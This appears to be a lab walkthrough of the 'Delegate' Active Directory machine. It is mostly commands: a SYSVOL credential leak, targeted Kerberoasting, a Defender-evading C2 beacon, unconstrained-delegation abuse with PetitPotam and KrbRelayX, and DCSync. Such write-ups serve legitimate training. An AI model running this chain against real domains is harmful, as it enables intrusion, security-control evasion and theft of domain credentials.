Delegate
Overview
Delegate is an Active Directory machine where credentials are leaked in a plaintext SYSVOL logon script. BloodHound reveals an ACL path from A.Briggs to N.Thompson (GenericWrite → targeted Kerberoast). N.Thompson has SeEnableDelegationPrivilege allowing us to configure our own machine account with unconstrained delegation. We then use PetitPotam to coerce the DC into authenticating to our machine, capture the DC$ TGT via KrbRelayX, and perform DCSync for the Administrator hash.
Recon
Nmap
sudo nmap -sC -sV -vv -oA tcp 10.129.75.202 && sudo nmap -sC -sV -vv -p- -oA allports 10.129.75.202Standard Windows DC ports. Add dc1.delegate.vl and delegate.vl to /etc/hosts.
SMB - Guest Access and SYSVOL
Authenticate as a guest and enumerate shares:
Reading SYSVOL/delegate.vl/scripts/users.bat reveals plaintext credentials for A.Briggs:
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123Credentials: A.Briggs:P4ssw0rd1#123
Foothold
BloodHound Mapping
With A.Briggs credentials, run a BloodHound collector:
nxc smb dc1.delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123' -d 'delegate.vl' --sharesbloodhound-ce-python -c all -u A.Briggs -p 'P4ssw0rd1#123' -d delegate.vl -dc dc1.delegate.vl --dns-tcp -ns 10.129.75.202BloodHound shows A.Briggs has GenericWrite over N.THOMPSON:
Targeted Kerberoast via GenericWrite
GenericWrite over a user allows setting an SPN on that account. Once an SPN is set, the account becomes Kerberoastable - we can request a TGS and crack it offline.
Use bloodyAD to set an SPN on N.Thompson:
bloodyAD --host 10.129.75.202 -d "delegate.vl" -u 'A.Briggs' -p 'P4ssw0rd1#123' \
set object N.THOMPSON servicePrincipalName -v 'cifs/syk0'Request the TGS hash:
impacket-GetUserSPNs -dc-ip 10.129.75.202 -request -request-user N.THOMPSON \
delegate.vl/A.Briggs:'P4ssw0rd1#123'Lateral Movement
Crack N.Thompson's hash with hashcat:
hashcat -m 13100 -a 0 n.thompson_hash /mnt/hgfs/I/data/rockyou.txtCracked: N.Thompson:KALEB_2341
Defender is running on the target, so use RustHarder (a Defender-evasive loader) to deploy an AdaptixC2 agent:
AdaptixC2 beacon received:
Privilege Escalation
SeEnableDelegationPrivilege → Unconstrained Delegation
N.Thompson has SeMachineAccountPrivilege (can add computer accounts) and SeEnableDelegationPrivilege (can set delegation flags on objects). Together, these allow creating a computer account and marking it as trusted for unconstrained delegation.
Step 1 - Add a machine account:
impacket-addcomputer -dc-ip 10.129.17.200 -computer-name syk0 delegate.vl/N.THOMPSON:KALEB_2341
# [*] Successfully added machine account syk0$ with password Z0UO785ETYcs2ix1xUNzatoxI50YS8KX.Step 2 - Enable unconstrained delegation on the new machine:
bloodyAD -d 'delegate.vl' -u 'N.THOMPSON' -p 'KALEB_2341' --host 10.129.17.200 \
add uac 'syk0$' -f TRUSTED_FOR_DELEGATIONStep 3 - Set an SPN on the machine (required for Kerberos):
bloodyAD --host 10.129.17.200 -d 'delegate.vl' -u 'N.THOMPSON' -p 'KALEB_2341' \
set object 'syk0$' servicePrincipalName -v 'cifs/syk0'BloodHound now shows a path from our machine account to the DC via unconstrained delegation:
Step 4 - Retrieve the machine account NT hash:
Step 5 - Add a DNS record (PetitPotam needs to resolve our hostname):
bloodyAD --host 10.129.17.200 -d 'delegate.vl' -u 'N.THOMPSON' -p 'KALEB_2341' \
add dnsRecord syk0 10.10.14.174PetitPotam + KrbRelayX - Capture DC$ TGT
When a computer has unconstrained delegation, any TGT presented to it is cached. If we coerce the DC to authenticate to our machine, the DC$'s TGT is stored and can be extracted.
Start KrbRelayX to capture incoming Kerberos tickets:
python3 krbrelayx.py -hashes :22C08F3D9EE067612378953FC70D14C4Use PetitPotam to coerce the DC into authenticating to our machine via MS-EFSRPC:
python3 PetitPotam.py -target-ip 10.129.17.200 -dc-ip 10.129.17.200 \
-u 'syk0$' -p 'Z0UO785ETYcs2ix1xUNzatoxI50YS8KX' syk0 dc1.delegate.vlKrbRelayX captures the DC$'s TGT. Use it to perform DCSync:
impacket-secretsdump -just-dc-user Administrator -k dc1.delegate.vlAttack Chain Summary
| Phase | Technique | Result |
|---|---|---|
| Recon | SYSVOL logon script | A.Briggs:P4ssw0rd1#123 |
| Discovery | BloodHound | GenericWrite over N.Thompson |
| Lateral movement | Targeted Kerberoast → hashcat | N.Thompson:KALEB_2341 |
| Evasion | RustHarder + AdaptixC2 | Beacon (Defender bypass) |
| Privesc setup | addcomputer + unconstrained delegation | syk0$ TFD |
| TGT capture | PetitPotam + KrbRelayX | DC$ TGT |
| Domain admin | DCSync | Administrator hash |